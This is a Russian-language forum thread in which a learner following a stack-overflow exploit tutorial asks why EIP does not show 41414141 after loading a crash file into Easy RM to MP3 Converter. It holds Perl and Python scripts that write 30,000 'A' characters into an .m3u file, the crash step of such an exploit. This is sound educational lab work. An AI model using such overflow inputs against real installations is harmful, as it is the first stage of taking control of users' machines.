Не могу следовать туториалу по написанию эксплойта

09.05.2019
3
0
Привет.

Следую этому туториалу:
Exploit Writing Tutorial Part 1: Stack Based Overflows (Перевод: p(eaz, RDot.org)

У него в EIP указан 41414141. Что является шестнадцатиричным представлением AAAA. Но у меня на win xp 32 и win 7 32 в EIP указан адрес на ntdll. Что мне с этим делать? Там дальше по туториалу совсем другое.

Спасибо.
 

Вложения

  • Снимок1.PNG
    Снимок1.PNG
    32,4 КБ · Просмотры: 392
Мало инфы, на каком шаге сделан скрин? Без отладчика приложение крашелось?
Есть хорошая серия статей Exploit
 
Сделай скриншоты по всем действиям, которые делаешь. Не понятно, на каком моменте произошла ошибка. Т.е. может ты что-то до этого не так написал или что-то пропустил.
 
@HebiNeco, @polunochnik

Создаю m3u файл с таким кодом:


Код:
#!usr/bin/perl
my $file= "crash.m3u";
my $junk= "\x41" x 30000;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "m3u File Created successfully\n";

Затем в Easy Rm to MP3Converter загружаю m3u. Появляется ошибка.

crash.PNG

Прикрепляюсь к процессу уязвимой программы в immunity debugger. Но вместо значения EIP 41414141 там адрес с ntdll.

2.PNG

Хотя в гайде там вот так должно быть:

immunity1.png

Все это делаю на виртуальной win 7 32 virtualBox.
 
@HebiNeco, @polunochnik

Создаю m3u файл с таким кодом:


Код:
#!usr/bin/perl
my $file= "crash.m3u";
my $junk= "\x41" x 30000;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "m3u File Created successfully\n";

Затем в Easy Rm to MP3Converter загружаю m3u. Появляется ошибка.

Посмотреть вложение 42099

Прикрепляюсь к процессу уязвимой программы в immunity debugger. Но вместо значения EIP 41414141 там адрес с ntdll.

Посмотреть вложение 42100

Хотя в гайде там вот так должно быть:

Посмотреть вложение 42101

Все это делаю на виртуальной win 7 32 virtualBox.
1. Ести отладочные символы?
2. Памяти нет, не понятно какая сейчас ситуация на стеке,
3. пробовал в отладчика на несколько шагов вперёд пройти
4. Точно так же как в гайде не будет, там ХР, а у тебя семёрка.
5. При краше приложения у тебя было в сообщении адрес 0x41414141, но в отладчике ничего
 
@polunochnik

1. Включил. Не помогло.
2. Это какая вкладка в дебаггере? Memory?

Посмотреть вложение 42106

3. Не знаю как это сделать.
4. Вот человек сделал гайд с 7 Proj 10: Exploiting Easy RM to MP3 Converter on Windows with ASLR (20 pts.)
Смотри, eip у тебя не такой как в гайде, потому что банально ты в отладчике не дошёл до момента падения.
Я бы все таки начал бы с чего попроще (ранее кидал ссылку на серию статей), что бы сложилось понимание как это все работает, тогда и большинство вопросов отпадут сами собой.
 
@HebiNeco, @polunochnik

Создаю m3u файл с таким кодом:


Код:
#!usr/bin/perl
my $file= "crash.m3u";
my $junk= "\x41" x 30000;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "m3u File Created successfully\n";
Не надо создавать файл .m3u с таким кодом!!!!!!!
Это скрипт на языке программирования Perl который создает файл .m3u внутри которого будет 30 тыщ букв "A".
Ты можешь сделать тоже самое на языке Python.

Python:
#!/usr/bin/env python
# -*- coding: utf-8 -*-

payload = "A" * 30000
exploit = open("evil.m3u", "w")
exploit.write(payload)
exploit.close()
print("m3u File Created successfully")

ошибка в том что ты запихал код в файл .m3u, когда надо было запустить код, который создаст этот файл.
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →

Популярный контент

🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab